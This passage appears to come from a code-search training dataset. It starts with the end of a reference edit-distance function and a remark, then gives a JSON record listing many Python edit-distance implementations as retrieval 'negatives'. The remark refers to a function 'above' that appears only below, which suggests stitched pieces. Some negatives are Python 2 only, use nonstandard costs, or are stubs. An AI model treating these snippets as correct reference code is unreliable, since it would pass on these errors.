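    dp[0, :] = np.arange(len(s2) + 1) * gap_penalty  # insert all of s2's prefix
    for i in range(1, len(s1) + 1):
        for j in range(1, len(s2) + 1):
            dp[i, j] = min(dp[i - 1, j] + gap_penalty,                         # deletion
                           dp[i, j - 1] + gap_penalty,                         # insertion
                           dp[i - 1, j - 1] + sub_cost(s1[i - 1], s2[j - 1]))  # substitution
    return int(dp[len(s1), len(s2)])

assert reference_editdistance("CASSLGTDTQYF", "CASSPGADTQYF") == 2  # two substitutions
assert reference_editdistance("CASSL", "CASL") == 1                 # one deletion

Note that the equal-length fast path in the record above is a pure substitution distance; as its inline comment says, it can exceed the strict edit distance in cases where inserting the same number of gaps in both sequences would be cheaper.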
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def word_embedding_levenshtein(seq1, seq2, embeddings, average_distance, r=0.9, normalise=False):\n\tx1 = 1 + len(seq1)\n\tx2 = 1 + len(seq2)\n\n\talpha = r / ((1 - r) * average_distance)\n\n\t# Initialisation of the matrix\n\td = [] # Using Numpy structures for this is probably not more efficient\n\td.append(list(range(x2)))\n\tfor i in range(1, x1):\n\t\td.append([i] * x2)\n\n\t# Core of the algorithm\n\tfor i in range(1, x1):\n\t\tfor j in range(1, x2):\n\t\t\te1 = seq1[i-1]\n\t\t\te2 = seq2[j-1]\n\n\t\t\tif(e1 == e2): c = 0\n\t\t\telse:\n\t\t\t\tv1 = embeddings[e1]\n\t\t\t\tv2 = embeddings[e2]\n\n\t\t\t\tif((v1 is None) or (v2 is None)): c = 1\n\t\t\t\telse:\n\t\t\t\t\tdst = np.linalg.norm(v1 - v2) # Distance 2 (or L2 norm of the difference)\n\n\t\t\t\t\t# Now, we need a function increasing function mapping 0 to 0 and +inf to 1\n\t\t\t\t\tc = 1 - (1 / (1 + (alpha * dst)))\n\n\t\t\t\t\t#c /= r # If you uncomment this line, the cost of a substitution at distance `average_distance` will be 1 and substitutions might have higher cost, up to 1/r. This might be justified as long as `r` is above 0.5 (otherwise, some substitutions might be more expensive than an insertion followed by a deletion).\n\n\t\t\td[i][j] = min(\n\t\t\t\t(d[(i-1)][j] + 1), # Deletion of seq1[i]\n\t\t\t\t(d[i][(j-1)] + 1), # Insertion of seq2[j]\n\t\t\t\t(d[(i-1)][(j-1)] + c) # Substitution from seq1[i] to seq2[j]\n\t\t\t)\n\n\traw = d[-1][-1]\n\n\tif(normalise): return (raw / (len(seq1) + len(seq2)))\n\treturn raw", "def levenshteinDistance(s1, s2):\n singleLetterMapping = {DOWNLEFT: '1', DOWN:'2', DOWNRIGHT:'3',\n LEFT:'4', RIGHT:'6',\n UPLEFT:'7', UP:'8', UPRIGHT:'9'}\n\n len1 = len([singleLetterMapping[letter] for letter in s1])\n len2 = len([singleLetterMapping[letter] for letter in s2])\n\n matrix = list(range(len1 + 1)) * (len2 + 1)\n for i in range(len2 + 1):\n matrix[i] = list(range(i, i + len1 + 1))\n for i in range(len2):\n for j in range(len1):\n if s1[j] == s2[i]:\n matrix[i+1][j+1] = min(matrix[i+1][j] + 1, matrix[i][j+1] + 1, matrix[i][j])\n else:\n matrix[i+1][j+1] = min(matrix[i+1][j] + 1, matrix[i][j+1] + 1, matrix[i][j] + 1)\n return matrix[len2][len1]", "def get_levenshtein_distance(a, b):\r\n n, m = len(a), len(b)\r\n if n > m:\r\n # Make sure n <= m, to use O(min(n,m)) space\r\n a, b = b, a\r\n n, m = m, n\r\n current_row = range(n+1) # Keep current and previous row, not entire matrix\r\n\r\n for i in range(1, m+1):\r\n previous_row, current_row = current_row, [i]+[0]*n\r\n for j in range(1, n+1):\r\n add, delete, change = previous_row[j]+1, current_row[j-1]+1, previous_row[j-1]\r\n if a[j-1] != b[i-1]:\r\n change += 1\r\n current_row[j] = min(add, delete, change)\r\n return current_row[n]", "def edit_distance_between_seqs(seq1, seq2):\n aln1, aln2 = needleman_wunsch(seq1, seq2)\n return edit_distance_from_aln_strings(aln1, aln2)", "def _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n mx_L = nb.int_(np.max(seqs_L))\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n \n \"\"\"As long as ldmat is big enough to accomodate the largest sequence\n its OK to only use part of it for the smaller sequences\n NOTE that to create a 2D array it must be created 1D and reshaped\"\"\"\n ldmat = np.zeros(mx_L * mx_L, dtype=np.int16).reshape((mx_L, mx_L))\n for ind_i in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n \n q_L = seqs_L[query_i]\n s_L = 
seqs_L[seq_i]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\n This will make it differ from a strict edit-distance since\n the optimal edit-distance may insert same number of gaps in both sequences\"\"\"\n #tmp_dist = 0\n for i in range(q_L):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]]\n #dist[ind_i] = tmp_dist\n continue\n \n \"\"\"Do not need to re-zero each time\"\"\"\n # ldmat = np.zeros((q_L, s_L), dtype=np.int16)\n for row in range(1, q_L):\n ldmat[row, 0] = row * gap_penalty\n\n for col in range(1, s_L):\n ldmat[0, col] = col * gap_penalty\n \n for col in range(1, s_L):\n for row in range(1, q_L):\n ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty,\n ldmat[row, col-1] + gap_penalty,\n ldmat[row-1, col-1] + distance_matrix[seqs_mat[query_i, row-1], seqs_mat[seq_i, col-1]]) # substitution\n dist[ind_i] = ldmat[row, col]\n return dist", "def dameraulevenshtein(seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = (oneago, thisrow, [0] * len(seq2) + [x + 1])\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x - 1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def dameraulevenshtein(seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = (oneago, thisrow, [0] * len(seq2) + [x + 1])\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x - 1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def dameraulevenshtein(self, seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = range(1, len(seq2) + 1) + [0]\n for x in xrange(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. 
This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = oneago, thisrow, [0] * len(seq2) + [x + 1]\n for y in xrange(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x-1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def levenshtein_distance(first, second):\n if len(first) > len(second):\n first, second = second, first\n if len(second) == 0:\n return len(first)\n first_length = len(first) + 1\n second_length = len(second) + 1\n distance_matrix = [range(second_length) for x in range(first_length)]\n for i in range(1, first_length):\n for j in range(1, second_length):\n deletion = distance_matrix[i-1][j] + 1\n insertion = distance_matrix[i][j-1] + 1\n substitution = distance_matrix[i-1][j-1]\n if first[i-1] != second[j-1]:\n substitution += 1\n distance_matrix[i][j] = min(insertion, deletion, substitution)\n\n return distance_matrix[first_length-1][second_length-1]", "def dameraulevenshtein(seq1, seq2):\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = oneago, thisrow, [0] * len(seq2) + [x + 1]\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x-1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def levenshtein_distance(s1,s2):\n\n\t\tif len(s1) < len(s2):\n\t\t\treturn Searcher.levenshtein_distance(s2, s1)\n\n\t\t# len(s1) >= len(s2)\n\t\tif len(s2) == 0:\n\t\t\treturn len(s1)\n\n\t\tprevious_row = range(len(s2) + 1)\n\t\tfor i, c1 in enumerate(s1):\n\t\t\tcurrent_row = [i + 1]\n\t\t\tfor j, c2 in enumerate(s2):\n\t\t\t\tinsertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\n\t\t\t\tdeletions = current_row[j] + 1 # than s2\n\t\t\t\tsubstitutions = previous_row[j] + (c1 != c2)\n\t\t\t\tcurrent_row.append(min(insertions, deletions, substitutions))\n\t\t\tprevious_row = current_row\n\t\t\n\t\treturn previous_row[-1]", "def edit_distance(str1, str2, reconstruct_answer=False, method=alignments.Levinshtein(),\n swap_case_on_mismatch=True):\n method = alignments.Levinshtein() if method is None else method\n return align(str1, str2, reconstruct_answer, method, swap_case_on_mismatch)", "def distance_matrix(sequences, substitution_mat):\n distance_mat = numpy.empty((len(sequences), len(sequences)), dtype='float')\n\n print(\"Building distance matrix\")\n # Get similarity score\n for i, seqA in enumerate(sequences):\n sys.stdout.write(\"\\r%.f%%\" % (float(i+1)/len(sequences)*100))\n sys.stdout.flush()\n for j, seqB in enumerate(sequences[i:], start=i):\n score = 
substitution_score(substitution_mat, seqA, seqB)\n distance_mat[i, j] = score\n distance_mat[j, i] = score\n print(\"\")\n # Set equal the diagonal\n diag_mini = numpy.min(distance_mat.diagonal())\n for i in range(len(sequences)):\n distance_mat[i, i] = diag_mini\n # Convert similarity score into a distance\n mini = numpy.min(distance_mat)\n maxi = numpy.max(distance_mat)\n return 1 - (distance_mat + abs(mini))/(maxi - mini)", "def string_edit_dist(str1, str2):\n sm = edit_distance.SequenceMatcher(a=str1, b=str2)\n return sm.distance()", "def levenshtein_distance(str1, str2):\n m = len(str1)\n n = len(str2)\n lensum = float(m + n)\n d = [] \n for i in range(m+1):\n d.append([i]) \n del d[0][0] \n for j in range(n+1):\n d[0].append(j) \n for j in range(1,n+1):\n for i in range(1,m+1):\n if str1[i-1] == str2[j-1]:\n d[i].insert(j,d[i-1][j-1]) \n else:\n minimum = min(d[i-1][j]+1, d[i][j-1]+1, d[i-1][j-1]+2) \n d[i].insert(j, minimum)\n ldist = d[-1][-1]\n ratio = (lensum - ldist)/lensum\n return {'distance':ldist, 'ratio':ratio}", "def test_matrix_distance(self):\n # note that the score matrix must contain 'diagonal' elements m[i][i]\n # to avoid failure when the sequences match.\n m = {\"U\": {\"U\": 0, \"C\": 1, \"A\": 5}, \"C\": {\"C\": 0, \"A\": 2, \"G\": 4}}\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"UCACGG\", m), 14)\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"\", m), 0)\n self.assertEqual(self.RNA(\"UUU\").matrix_distance(\"CAC\", m), 7)\n self.assertRaises(KeyError, self.RNA(\"UUU\").matrix_distance, \"CAG\", m)", "def find_edit_distance(string1,string2):\n M=zeros((len(string1)+1,len(string2)+1), dtype=int)\n for i in xrange(1,len(string1)+1):\n M[i][0]=i\n for j in xrange(1,len(string2)+1):\n M[0][j]=j\n for i in xrange(1,len(string1)+1):\n for j in xrange(1,len(string2)+1):\n if(string1[i-1]!=string2[j-1]):\n M[i][j] = min(M[i - 1][j] + 1, M[i][j - 1] + 1, M[i - 1][j - 1] + 1)\n else:\n M[i][j] = M[i - 1][j - 1]\n return M[len(string1)][len(string2)]", "def levenshtein(s1, s2):\n if len(s1) < len(s2):\n return levenshtein(s2, s1)\n\n # len(s1) >= len(s2)\n if len(s2) == 0:\n return len(s1)\n\n previous_row = range(len(s2) + 1)\n for i, c1 in enumerate(s1):\n current_row = [i + 1]\n for j, c2 in enumerate(s2):\n insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\n deletions = current_row[j] + 1 # than s2\n substitutions = previous_row[j] + (c1 != c2)\n current_row.append(min(insertions, deletions, substitutions))\n previous_row = current_row\n \n return previous_row[-1]", "def _pairwise_dist(self,seq1,seq2):\n \n return jf.damerau_levenshtein_distance(str(seq1), str(seq2))", "def distances(a, b):\n # generating matrix\n matrix = [[(0, None) for x in range(len(b) + 1)] for y in range(len(a) + 1)]\n\n # base case\n for i in range(1, len(a) + 1):\n matrix[i][0] = (i, Operation.DELETED)\n for j in range(1, len(b) + 1):\n matrix[0][j] = (j, Operation.INSERTED)\n\n # fill in matrix with tuples (cost, operation)\n for i in range(1, len(a) + 1):\n for j in range(1, len(b) + 1):\n # edit distance algorithm\n # costs for deletion, insertion and substitution\n delete_cost = matrix[i - 1][j][0] + 1\n insert_cost = matrix[i][j - 1][0] + 1\n substitute_cost = matrix[i - 1][j - 1][0]\n if a[i - 1] != b[j - 1]:\n substitute_cost += 1\n\n # edit distance is min cost of deletion, insertion, substitution\n if delete_cost < insert_cost and delete_cost < substitute_cost:\n matrix[i][j] = (delete_cost, 
Operation.DELETED)\n elif insert_cost < substitute_cost:\n matrix[i][j] = (insert_cost, Operation.INSERTED)\n else:\n matrix[i][j] = (substitute_cost, Operation.SUBSTITUTED)\n\n return matrix", "def damerau_levenshtein_similarity(s1, s2):\n max_cost = max(len(s1), len(s2))\n\n if max_cost == 0:\n return 1.0\n\n return 1.0 - float(damerau_levenshtein_distance(s1, s2)) / max_cost", "def question7(seq_x, seq_y):\n \n diag_score = 2\n off_diag_score = 1\n dash_score = 0\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n score_matrix = student.build_scoring_matrix(alphabet, diag_score, off_diag_score, dash_score)\n \n align_matrix = student.compute_alignment_matrix(seq_x, seq_y, score_matrix, True)\n score, align_x, align_y = student.compute_global_alignment(seq_x, seq_y, score_matrix, align_matrix)\n \n edit_distance = len(seq_x) + len(seq_y) - score\n \n print \"Edit distance: \" + str(edit_distance)\n print align_x\n print align_y", "def edit_distance_from_aln_strings(str1, str2):\n assert len(str1) == len(str2)\n edit_distance = 0\n in_gap = False\n\n for i, char1 in enumerate(str1):\n if char1 == \"-\" or str2[i] == \"-\":\n if not in_gap:\n in_gap = True\n edit_distance += 1\n else:\n in_gap = False\n\n if char1 != str2[i]:\n edit_distance += 1\n\n return edit_distance", "def levenshtein(seq1: str, seq2: str) -> int:\n if seq1 == \"\":\n return len(seq2)\n if seq2 == \"\":\n return len(seq1)\n if seq1[-1] == seq2[-1]:\n cost = 0\n else:\n cost = 1\n \n result = min([levenshtein(seq1[:-1], seq2) + 1,\n levenshtein(seq1, seq2[:-1]) + 1,\n levenshtein(seq1[:-1], seq2[:-1]) + cost ])\n return result", "def iterative_levenshtein(self, w1, d1, w2, d2):\n rows = len(w1) + 1\n cols = len(w2) + 1\n dist = [[0 for x in range(cols)] for x in range(rows)]\n # source prefixes can be transformed into empty strings\n # by deletions:\n for i in range(1, rows):\n dist[i][0] = i\n # target prefixes can be created from an empty source string\n # by inserting the characters\n for i in range(1, cols):\n dist[0][i] = i\n\n for col in range(1, cols):\n for row in range(1, rows):\n if w1[row - 1] == w2[col - 1]:\n cost = 0\n else:\n cost = 1\n dist[row][col] = min(dist[row - 1][col] + 1, # deletion\n dist[row][col - 1] + 1, # insertion\n dist[row - 1][col - 1] + cost) # substitution\n return dist[row][col] < 5", "def compute_l2_distance_matrix(features_queries, features_dataset):\n sx = np.sum(features_queries ** 2, axis=1, keepdims=True)\n sy = np.sum(features_dataset ** 2, axis=1, keepdims=True)\n\n return np.sqrt(-2 * features_queries.dot(features_dataset.T) + sx + sy.T)", "def nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n #print(indices.shape)\n #print(seqs_mat.shape)\n #print(seqs_L.shape)\n return _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix, gap_penalty)", "def weighted_levenshtein(seq1, seq2, weights, normalise=False):\n\tx1 = 1 + len(seq1)\n\tx2 = 1 + len(seq2)\n\n\t# Initialisation of the matrix\n\td = [] # Using Numpy structures for this is probably not more efficient\n\ttmp = 0.0\n\tfirst_line = [tmp]\n\tfor e in seq2:\n\t\ttmp += weights.get(e, 1)\n\t\tfirst_line.append(tmp)\n\td.append(first_line)\n\ttmp = 0\n\tfor e in seq1:\n\t\ttmp += weights.get(e, 1)\n\t\td.append([tmp] * x2)\n\n\t# Core of the algorithm\n\tfor i in range(1, x1):\n\t\tfor j in range(1, x2):\n\t\t\te1 = seq1[i-1]\n\t\t\te2 = seq2[j-1]\n\n\t\t\tw1 = weights.get(e1, 1)\n\t\t\tw2 = 
weights.get(e2, 1)\n\n\t\t\td[i][j] = min(\n\t\t\t\t(d[(i-1)][j] + w1), # Deletion of seq1[i]\n\t\t\t\t(d[i][(j-1)] + w2), # Insertion of seq2[j]\n\t\t\t\t(d[(i-1)][(j-1)] + (int(e1 != e2) * max(w1, w2))) # Substitution from seq1[i] to seq2[j]\n\t\t\t)\n\n\traw = d[-1][-1]\n\n\tif(normalise): return (raw / (d[0][-1] + d[-1][0]))\n\treturn raw", "def lev_dist(s1, s2):\n\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.Levenshtein()\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n # Call the function to compute the distance measure.\n return measure.get_raw_score(s1, s2)", "def damerau_levenshtein_distance(s1, s2):\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n # s1 = utils.unicode_normalize(s1)\n # s2 = utils.unicode_normalize(s2)\n\n n1, n2 = len(s1), len(s2)\n infinite = n1 + n2\n\n char_arr = defaultdict(int)\n dp = [[0] * (n2 + 2) for _ in range(n1 + 2)]\n\n dp[0][0] = infinite\n for i in range(0, n1 + 1):\n dp[i + 1][0] = infinite\n dp[i + 1][1] = i\n for i in range(0, n2 + 1):\n dp[0][i + 1] = infinite\n dp[1][i + 1] = i\n\n for i in range(1, n1 + 1):\n db = 0\n for j in range(1, n2 + 1):\n i1 = char_arr[s2[j - 1]]\n j1 = db\n cost = 1\n if s1[i - 1] == s2[j - 1]:\n cost = 0\n db = j\n\n dp[i + 1][j + 1] = min(dp[i][j] + cost,\n dp[i + 1][j] + 1,\n dp[i][j + 1] + 1,\n dp[i1][j1] + (i - i1 - 1) + 1 + (j - j1 - 1))\n char_arr[s1[i - 1]] = i\n\n return dp[n1 + 1][n2 + 1]", "def __levenshtein(a, b):\n\n n, m = len(a), len(b)\n if n > m:\n # Make sure n <= m, to use O(min(n,m)) space\n a, b = b, a\n n, m = m, n\n\n current = list(range(n + 1))\n for i in range(1, m + 1):\n previous, current = current, [i] + [0] * n\n for j in range(1, n + 1):\n add, delete = previous[j] + 1, current[j - 1] + 1\n change = previous[j - 1]\n if a[j - 1] != b[i - 1]:\n change = change + 1\n current[j] = min(add, delete, change)\n\n return current[n]", "def edit_distance(str1, str2):\r\n pass", "def levenshtein_dist(s1, s2, dele, add, sub):\n m = np.zeros((len(s1)+1, len(s2)+1), dtype=np.int)\n p = np.zeros((len(s1)+1, len(s2)+1), dtype=np.float)\n for i in range(len(s1)+1):\n m[i, 0] = i\n # compute probability for deletion\n if i == 0:\n p[i, 0] = 1\n else:\n ind = alphabet.index('@')\n p[i, 0] = p[i-1, 0] * dele[ind, alphabet.index(s1[i-1])]\n for j in range(len(s2)+1):\n # compute probability for insertion\n if j == 0:\n p[0, j] = 1\n else:\n prev_char = '@' if j == 1 else s2[j-2]\n p[0, j] = p[0, j-1] * add[alphabet.index(prev_char),\n alphabet.index(s2[j-1])]\n m[0, j] = j\n for i in range(1, 1+len(s1)):\n for j in range(1, len(s2)+1):\n if s1[i-1] == s2[j-1]:\n k = np.argmin([m[i-1, j] + 1, m[i, j-1] + 1, m[i-1, j-1]])\n if k == 0:\n # deletion\n m[i, j] = m[i-1, j] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i-1, j] * dele[alphabet.index(prev_char), alphabet.index(s1[i-1])]\n elif k == 1:\n # insertion\n m[i, j] = m[i, j-1] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i, j-1] * add[alphabet.index(prev_char), alphabet.index(s2[j-1])]\n else:\n # no mistake\n m[i, j] = m[i-1, j-1]\n p[i, j] = p[i-1, j-1]\n else:\n k = np.argmin([m[i-1, j] + 1, m[i, j-1] + 1, m[i-1, j-1] + 1])\n if k == 0:\n # deletion\n m[i, j] = m[i-1, j] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i-1, j] * dele[alphabet.index(prev_char), alphabet.index(s1[i-1])]\n elif k == 1:\n # insertion\n m[i, j] = m[i, j-1] + 1\n prev_char = 
'@' if j == 1 else s2[j-2]\n p[i, j] = p[i, j-1] * add[alphabet.index(prev_char), alphabet.index(s2[j-1])]\n else:\n # substitution\n m[i, j] = m[i-1, j-1] + 1\n p[i, j] = p[i-1, j-1] * sub[alphabet.index(s1[i-1]), alphabet.index(s2[j-1])]\n # recall that in sub[X, Y], Y is the correct word\n\n return m[len(s1), len(s2)], p[len(s1), len(s2)]", "def edit_distance(s1, s2, transpositions=False):\r\n # set up a 2-D array\r\n len1 = len(s1)\r\n len2 = len(s2)\r\n lev = _edit_dist_init(len1 + 1, len2 + 1)\r\n\r\n # iterate over the array\r\n for i in range(len1):\r\n for j in range(len2):\r\n _edit_dist_step(lev, i + 1, j + 1, s1, s2, transpositions=transpositions)\r\n return lev[len1][len2]", "def matrix(sequence_a, sequence_b, match_score=3, gap_cost=2):\n\n # Everything that is not a match is a zero\n # Why do we make the length of the sequences longer?\n score_matrix = np.zeros((len(sequence_a) + 1, len(sequence_b) + 1), np.int)\n\n for i, j in itertools.product(range(1, score_matrix.shape[0]), range(1, score_matrix.shape[1])):\n # add match_score if the previous elements in the sequences match else subtract match_score\n match = score_matrix[i - 1, j - 1] \\\n + (match_score if sequence_a[i - 1] == sequence_b[j - 1] else - match_score)\n # subtract the gap_cost - insertions/deletions depends on which\n # is the source and which is the target sequence\n delete = score_matrix[i - 1, j] - gap_cost\n insert = score_matrix[i, j - 1] - gap_cost\n # Insert the highest score as the value for the traceback\n score_matrix[i, j] = max(match, delete, insert, 0)\n return score_matrix", "def edit_distance_dp(str1, str2):\n rows = len(str1) + 1\n cols = len(str2) + 1\n dp_table = [[0 for j in range(cols)] for i in range(rows)]\n for row in range(rows):\n for col in range(cols):\n if row == 0 or col == 0:\n dp_table[row][col] = max(row, col)\n else:\n if str1[row - 1] == str2[col - 1]:\n dp_table[row][col] = dp_table[row - 1][col - 1]\n else:\n replace = dp_table[row - 1][col - 1]\n insert = dp_table[row][col - 1]\n delete = dp_table[row - 1][col]\n dp_table[row][col] = min(replace, insert, delete) + 1\n \n return dp_table[rows-1][cols-1]", "def _levenshtein_distance(t1: Trace, t2: Trace):\n if t1.length > t2.length:\n t1, t2 = t2, t1\n\n distances = range(t1.length + 1)\n for i2, c2 in enumerate(t2.event_list):\n distances_ = [i2 + 1]\n for i1, c1 in enumerate(t1.event_list):\n if c1 == c2:\n distances_.append(distances[i1])\n else:\n distances_.append(1 + min((distances[i1], distances[i1 + 1], distances_[-1])))\n distances = distances_\n return distances[-1]", "def seq_align(string1,string2,mismatch_penalty,gap_penalty):\n\n # define the 2-D DP matrix\n matrix = []\n for i in range(len(string1)+1):\n if i == 0:\n matrix.append(list([gap_penalty * x for x in range(len(string2)+1)]))\n else:\n matrix.append(list([gap_penalty * i if x == 0 else None for x in range(len(string2)+1)]))\n\n # populate matrix by looping through the strings and finding optimal value for each spot\n for i in range(len(string1)):\n for j in range(len(string2)):\n if string1[i] == string2[j]:\n val1 = 0 + matrix[i][j]\n else:\n val1 = mismatch_penalty + matrix[i][j]\n val2 = gap_penalty + matrix[i][j+1]\n val3 = gap_penalty + matrix[i+1][j]\n min_val = min(val1,val2,val3)\n matrix[i+1][j+1] = min_val\n\n\n # define values to use while retracing\n result_str1 = ''\n result_str2 = ''\n i = len(matrix)-1\n j = len(matrix[0])-1\n\n # trace through matrix to find the optimal character alignment\n while i > 0 and j > 0:\n val1 = 
matrix[i-1][j-1]\n val2 = matrix[i-1][j]\n val3 = matrix[i][j-1]\n min_val = min(val1,val2,val3)\n if val1 == min_val:\n result_str1 += string1[i-1]\n result_str2 += string2[j-1]\n i -= 1\n j -= 1\n elif val2 == min_val:\n result_str1 += \"-\"\n result_str2 += string2[j-1]\n i -= 1\n else:\n result_str1 += string1[i-1]\n result_str2 += \"-\"\n j -= 1\n\n # for any leftover j values\n if i == 0:\n while j > 0:\n result_str1 += '-'\n result_str2 += string2[j-1]\n j -= 1\n\n # for any leftover i values\n if j == 0:\n while i > 0:\n result_str1 += string1[i-1]\n result_str2 += \"-\"\n i -= 1\n\n return matrix[len(matrix)-1][len(matrix[0])-1], result_str1[::-1], result_str2[::-1]", "def editDistance(l1, l2):\n cache = [[None for i in range(len(l2) + 1)] for j in range(len(l1) + 1)]\n \n for row in range(len(l1) + 1):\n for col in range(len(l2) + 1):\n if row == 0 and col == 0:\n cache[row][col] = 0\n elif col == 0:\n cache[row][col] = row\n elif row == 0:\n cache[row][col] = col\n elif l1[row - 1] == l2[col - 1]:\n cache[row][col] = cache[row - 1][col - 1]\n else:\n a = cache[row - 1][col]\n b = cache[row][col - 1]\n c = cache[row - 1][col - 1]\n cache[row][col] = min(a, b, c) + 1\n\n return findResult(l1, l2, cache)", "def levenshtein_distance(s, t, alphabet=string.printable, **weight_dict):\n if len(s) == 0 or len(t) == 0:\n return max([len(s), len(t)])\n\n rows = len(s) + 1\n cols = len(t) + 1\n\n w = dict((x, (1, 1, 1)) for x in alphabet + alphabet.upper())\n if weight_dict:\n w.update(weight_dict)\n\n dist = [[0 for _ in range(cols)] for _ in range(rows)]\n # source prefixes can be transformed into empty strings\n # by deletions:\n for row in range(1, rows):\n dist[row][0] = dist[row - 1][0] + w[s[row - 1]][0]\n # target prefixes can be created from an empty source string\n # by inserting the characters\n for col in range(1, cols):\n dist[0][col] = dist[0][col - 1] + w[t[col - 1]][1]\n\n for col in range(1, cols):\n for row in range(1, rows):\n deletes = w[s[row - 1]][0]\n inserts = w[t[col - 1]][1]\n subs = max((w[s[row - 1]][2], w[t[col - 1]][2]))\n if s[row - 1] == t[col - 1]:\n subs = 0\n else:\n subs = subs\n dist[row][col] = min(\n dist[row - 1][col] + deletes,\n dist[row][col - 1] + inserts,\n dist[row - 1][col - 1] + subs,\n ) # substitution\n\n return dist[row][col]", "def edit_distance(wordA, wordB):\n if not isinstance(wordA,list):\n lettersA = tamil.utf8.get_letters(wordA)\n else:\n lettersA = wordA\n\n if not isinstance(wordB,list):\n lettersB = tamil.utf8.get_letters(wordB)\n else:\n lettersB = wordB\n n_A = len(lettersA)\n n_B = len(lettersB)\n dist_AB = [[0 for i in range(0, n_B + 1)] for i in range(0, (n_A + 1))]\n # Target prefix reached by insertion\n for j in range(1, n_B + 1):\n dist_AB[0][j] = j\n for i in range(1, n_A + 1):\n dist_AB[i][0] = i\n for j in range(1, n_B + 1):\n for i in range(1, n_A + 1):\n if lettersA[i - 1] == lettersB[j - 1]:\n new_dist = dist_AB[i - 1][j - 1]\n else:\n new_dist = min(\n [\n dist_AB[i - 1][j] + 1,\n dist_AB[i][j - 1] + 1,\n dist_AB[i - 1][j - 1] + 1,\n ]\n ) # del, ins, or sub\n dist_AB[i][j] = new_dist\n return dist_AB[-1][-1]", "def minimum_edit_distance(seq1,seq2):\n if len(seq1) > 